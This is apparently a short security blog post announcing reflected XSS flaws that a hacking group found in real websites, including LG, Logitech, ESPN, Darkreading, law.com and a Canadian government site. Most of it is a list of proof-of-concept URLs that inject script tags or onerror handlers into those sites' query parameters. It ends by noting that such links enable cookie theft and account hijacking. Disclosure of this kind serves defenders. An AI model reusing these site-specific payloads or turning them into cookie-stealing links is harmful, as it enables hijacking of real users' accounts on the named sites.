Reflected XSS Vulnerability found in darkreading, LOGITECH, LG, law.com


The web-hacking group Zer0Lulz has discovered reflected XSS vulnerabilities in a number of high-profile sites, including LG, Logitech and Darkreading. The hackers named their operation "#OP XSSec".

Vulnerable sites and PoC:
http://www.nhl.com/ice/search?q=";alert("XSS");"

http://espn.go.com/espn/page2/index?id="><script>alert("XSS")</script>

http://www.food.com/recipes.php?chef="><script>alert("XSS")</script>

http://www.logitech.com/en-au/footer/terms-of-use/&id="><script>alert("XSS")</script>

http://www.darkreading.com/search/index?queryText="><script>alert("XSS")</script>

http://www.law.com/jsp/nj/PubArticleNJ.jsp?id="><script>alert("XSS")</script>

http://www.theweathernetwork.com/index.php?product=</script><script>alert("XSS")</script>

http://ryanseacrest.com/search/?q="><script>alert(/XSS/)</script>

http://common.at40.com/static/subway_polls/poll_frame.php?poll_id="></script><script>alert("XSS")</script>

http://www.lg.com/ca_en/common/search/controller.jsp?N=8110&Ntk=All&Ntt=<img src="XSS" onerror=alert("XSS");>&Nty=1&D=Lulz&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&srchLocalCode=ca_en&search_businessType=0&sid=1350DDC94D47

http://www.canada.gc.ca/cgi-bin/termium/autonomyTermium.pl?LULZ&"><script>alert("XSS")</script>

Social Engineering Attack:
Using a reflected XSS vulnerability of this kind, an attacker can steal cookies from a victim. Because these sites are trusted, users won't hesitate to click a link injected with XSS, and that can result in their accounts being hijacked.


Labels: Vulnerability, Web Application Vulnerability, XSS Vulnerability